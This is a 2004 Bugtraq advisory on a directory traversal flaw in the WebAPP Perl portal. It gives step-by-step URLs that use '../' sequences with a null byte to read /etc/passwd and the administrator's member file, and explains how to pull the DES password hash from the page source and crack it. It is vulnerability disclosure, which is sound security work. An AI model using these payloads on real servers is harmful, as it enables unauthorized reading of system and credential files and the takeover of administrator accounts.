[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    WebAPP directory traversal and ability to retrieve the DES
From:       "Jérôme" ATHIAS <jerome.athias () caramail ! com>
Date:       2004-08-24 15:42:51
Message-ID: 20040824154251.21637.qmail () www ! securityfocus ! com
[Download RAW message or body]




WebAPP is advertised as the internet's most feature rich,
easy to run PERL based portal system.
Its home site is at http://www.web-app.org/
Some features are :

   -Easy to Install on standard Unix servers!
      (Windows user-supported only!)
   -User Profiles
   -Message forums
   -Private messaging between members
   -Blog-style News Articles
   -Links and Downloads
   -Customizable themes
   -Multiple language support
   -Flat-file System-NO SQL DATABASE!
   -Membership controls
   -Open source

Several user mods are also available which ranges from chat
to e-commerce applications.

Several vulnerabilities in these mods have already been
discovered. 



The WebAPP system itself has a serious reverse directory
traversal vulnerability.

Example..

1) Go to http://vulnerable-target.xxx/cgi-bin/index.cgi
/this is their main support site/

2) Click on Articles on the main menu at the left side of
the screen

3) Click on any of the icons representing the misc topics
available   /i chose the "bugs" section/

4) You'll wind up with the url \
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=bugs" on the \
address bar on your browser. Change it to \
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00"


5)View the html source for the page



A more interesting file to look at would be;
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00"


View the html source code and scroll down until you come to
the line with;
href="index.cgi?action=viewnews&amp;id=adUCOOzV2ljgg"></a></td>

"adUCOOzV2ljgg" is the hashed password of the Administrator.
It's standard DES encrypted so you can
run a password cracking program to crack it

Every user would have a corresponding .dat file within the
db/members directory


PhTeam Release

Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and sa mga posers na kupal sa #oneball


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic